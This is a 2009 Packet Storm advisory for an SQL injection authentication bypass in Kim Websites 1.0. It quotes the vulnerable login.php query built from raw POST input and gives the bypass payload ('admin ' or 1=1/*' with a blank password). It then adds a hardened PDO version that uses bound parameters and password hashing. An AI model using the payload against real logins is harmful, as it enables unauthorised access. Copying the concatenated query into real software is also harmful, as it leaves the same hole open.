Kim Websites 1.0 SQL Injection

2009-03-13T00:00:00
ID PACKETSTORM:75705
Type packetstorm
Reporter hadihadi
Modified 2009-03-13T00:00:00

Description

                                        
###############################################################  
# #  
# Kim Websites 1.0 SQL Injection Vulnerability #  
# [ Authentication bypass] #  
###############################################################  
Virangar Security Team  
www.virangar.net  
--------  
Discovered By : Virangar Security Team (hadihadi)  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
& all virangar members & Aria_security team & all hackerz  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-----------------------------------  
vuln code in login.php:  
$username = $_POST['username'];  
$password = md5($_POST['password']);  
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";  
-----------------------  
Exploit:  
login:admin ' or 1=1/*  
password:[blank]  
-------------------------------------  
Y0ung Ir4ni4n H4ck3rz  
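
Added example (not part of the original advisory or of the Kim Websites code): a hardened form of the login.php lookup shown above, in which the username is passed as a bound parameter instead of being concatenated into the query. The table name kim_users, the function name login(), date2 stored as a Unix timestamp, the in-memory SQLite database standing in for the application's MySQL database, and the switch from md5() to password_hash()/password_verify() are all assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the application's users table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE kim_users (name TEXT, password TEXT, confirm INTEGER, date2 INTEGER)');
$ins = $db->prepare('INSERT INTO kim_users VALUES (?, ?, 1, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT), time() + 86400]);

// Hypothetical helper: returns true only for a confirmed, unexpired account
// whose stored hash matches the supplied password.
function login(PDO $db, string $table, string $username, string $password): bool
{
    // The table prefix is an identifier and cannot be bound, so allow-list it.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('bad table name');
    }
    // User input travels only as bound parameters, never inside the SQL text.
    $stmt = $db->prepare(
        "SELECT password FROM {$table} WHERE name = :name AND confirm = 1 AND date2 > :now"
    );
    $stmt->execute([':name' => $username, ':now' => time()]);
    $hash = $stmt->fetchColumn();
    // The password is checked in PHP against the stored hash, not in the WHERE clause.
    return is_string($hash) && password_verify($password, $hash);
}

// Valid credentials for the constructed account.
var_dump(login($db, 'kim_users', 'admin', 'correct horse'));
// The login string from the advisory, now compared as a literal user name.
var_dump(login($db, 'kim_users', "admin ' or 1=1/*", ''));
```

Because the quote and comment characters in the username never reach the SQL parser, the WHERE conditions on password, confirm and date2 can no longer be cut off by the input.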
  